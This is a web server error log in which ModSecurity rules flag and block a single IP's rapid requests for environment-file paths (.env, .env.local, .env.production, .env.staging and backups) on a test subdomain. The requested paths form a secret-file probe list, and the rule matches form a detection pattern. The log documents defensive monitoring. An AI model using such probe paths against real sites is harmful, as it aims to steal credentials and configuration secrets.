"OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgs3-9MmrgwjmYTAJT4gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.test.backup
[Fri Jan 16 03:21:39.182523 2026] [:error] [pid 1444031] [client 45.148.10.246:50220] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgs3-9MmrgwjmYTAJT4gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.test.backup
[Fri Jan 16 03:21:39.182742 2026] [:error] [pid 1444031] [client 45.148.10.246:50220] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgs3-9MmrgwjmYTAJT4gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.test.backup
[Fri Jan 16 03:21:39.182907 2026] [:error] [pid 1444031] [client 45.148.10.246:50220] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test.backup"] [unique_id "aWmgs3-9MmrgwjmYTAJT4gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./.env.test.backup
[Fri Jan 16 03:21:39.549050 2026] [:error] [pid 1444035] [client 45.148.10.246:51148] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env/"] [unique_id "aWmgs7auW6yeGWXfDeFYiQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/.env/
[Fri Jan 16 03:21:39.549280 2026] [:error] [pid 1444035] [client 45.148.10.246:51148] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env/"] [unique_id "aWmgs7auW6yeGWXfDeFYiQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/.env/
[Fri Jan 16 03:21:39.549431 2026] [:error] [pid 1444035] [client 45.148.10.246:51148] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env/"] [unique_id "aWmgs7auW6yeGWXfDeFYiQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/.env/
[Fri Jan 16 03:21:39.702305 2026] [:error] [pid 1444033] [client 45.148.10.246:51158] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmgs9LJkp65ULFQ2YYjNwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env
[Fri Jan 16 03:21:39.702584 2026] [:error] [pid 1444033] [client 45.148.10.246:51158] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmgs9LJkp65ULFQ2YYjNwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env
[Fri Jan 16 03:21:39.702748 2026] [:error] [pid 1444033] [client 45.148.10.246:51158] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmgs9LJkp65ULFQ2YYjNwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env
[Fri Jan 16 03:21:39.909595 2026] [:error] [pid 1444034] [client 45.148.10.246:51162] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmgs-RfEYyDES-ZFL4ixwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env
[Fri Jan 16 03:21:39.909827 2026] [:error] [pid 1444034] [client 45.148.10.246:51162] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmgs-RfEYyDES-ZFL4ixwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env
[Fri Jan 16 03:21:39.909988 2026] [:error] [pid 1444034] [client 45.148.10.246:51162] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aWmgs-RfEYyDES-ZFL4ixwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env
[Fri Jan 16 03:21:40.033604 2026] [:error] [pid 1444032] [client 45.148.10.246:51172] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtOkMvq8uPO2ZciWrXgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.local
[Fri Jan 16 03:21:40.033841 2026] [:error] [pid 1444032] [client 45.148.10.246:51172] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtOkMvq8uPO2ZciWrXgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.local
[Fri Jan 16 03:21:40.033989 2026] [:error] [pid 1444032] [client 45.148.10.246:51172] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtOkMvq8uPO2ZciWrXgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.local
[Fri Jan 16 03:21:40.257324 2026] [:error] [pid 1444040] [client 45.148.10.246:51176] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.local/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local/"] [unique_id "aWmgtPn_5sIyKhJ5GAza8AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.local/
[Fri Jan 16 03:21:40.257555 2026] [:error] [pid 1444040] [client 45.148.10.246:51176] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local/"] [unique_id "aWmgtPn_5sIyKhJ5GAza8AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.local/
[Fri Jan 16 03:21:40.257720 2026] [:error] [pid 1444040] [client 45.148.10.246:51176] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local/"] [unique_id "aWmgtPn_5sIyKhJ5GAza8AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.local/
[Fri Jan 16 03:21:40.420343 2026] [:error] [pid 1444031] [client 45.148.10.246:51190] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtH-9MmrgwjmYTAJT4wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.local
[Fri Jan 16 03:21:40.420583 2026] [:error] [pid 1444031] [client 45.148.10.246:51190] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtH-9MmrgwjmYTAJT4wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.local
[Fri Jan 16 03:21:40.420760 2026] [:error] [pid 1444031] [client 45.148.10.246:51190] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtH-9MmrgwjmYTAJT4wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.local
[Fri Jan 16 03:21:40.597765 2026] [:error] [pid 1444035] [client 45.148.10.246:51206] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtLauW6yeGWXfDeFYigAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.local
[Fri Jan 16 03:21:40.597991 2026] [:error] [pid 1444035] [client 45.148.10.246:51206] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtLauW6yeGWXfDeFYigAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.local
[Fri Jan 16 03:21:40.598158 2026] [:error] [pid 1444035] [client 45.148.10.246:51206] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.local"] [unique_id "aWmgtLauW6yeGWXfDeFYigAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.local
[Fri Jan 16 03:21:40.975826 2026] [:error] [pid 1444034] [client 45.148.10.246:51222] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.production/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production/"] [unique_id "aWmgtORfEYyDES-ZFL4iyAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.production/
[Fri Jan 16 03:21:40.976066 2026] [:error] [pid 1444034] [client 45.148.10.246:51222] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production/"] [unique_id "aWmgtORfEYyDES-ZFL4iyAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.production/
[Fri Jan 16 03:21:40.976249 2026] [:error] [pid 1444034] [client 45.148.10.246:51222] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production/"] [unique_id "aWmgtORfEYyDES-ZFL4iyAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.production/
[Fri Jan 16 03:21:41.163569 2026] [:error] [pid 1444032] [client 45.148.10.246:51230] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production"] [unique_id "aWmgtekMvq8uPO2ZciWrXwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.production
[Fri Jan 16 03:21:41.163802 2026] [:error] [pid 1444032] [client 45.148.10.246:51230] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production"] [unique_id "aWmgtekMvq8uPO2ZciWrXwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.production
[Fri Jan 16 03:21:41.163981 2026] [:error] [pid 1444032] [client 45.148.10.246:51230] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production"] [unique_id "aWmgtekMvq8uPO2ZciWrXwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.production
[Fri Jan 16 03:21:41.361730 2026] [:error] [pid 1444040] [client 45.148.10.246:51240] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production"] [unique_id "aWmgtfn_5sIyKhJ5GAza8QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.production
[Fri Jan 16 03:21:41.362033 2026] [:error] [pid 1444040] [client 45.148.10.246:51240] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production"] [unique_id "aWmgtfn_5sIyKhJ5GAza8QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.production
[Fri Jan 16 03:21:41.362211 2026] [:error] [pid 1444040] [client 45.148.10.246:51240] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.production"] [unique_id "aWmgtfn_5sIyKhJ5GAza8QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.production
[Fri Jan 16 03:21:41.517039 2026] [:error] [pid 1444031] [client 45.148.10.246:51252] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgtX-9MmrgwjmYTAJT5AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.staging
[Fri Jan 16 03:21:41.517263 2026] [:error] [pid 1444031] [client 45.148.10.246:51252] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgtX-9MmrgwjmYTAJT5AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.staging
[Fri Jan 16 03:21:41.517465 2026] [:error] [pid 1444031] [client 45.148.10.246:51252] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgtX-9MmrgwjmYTAJT5AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.staging
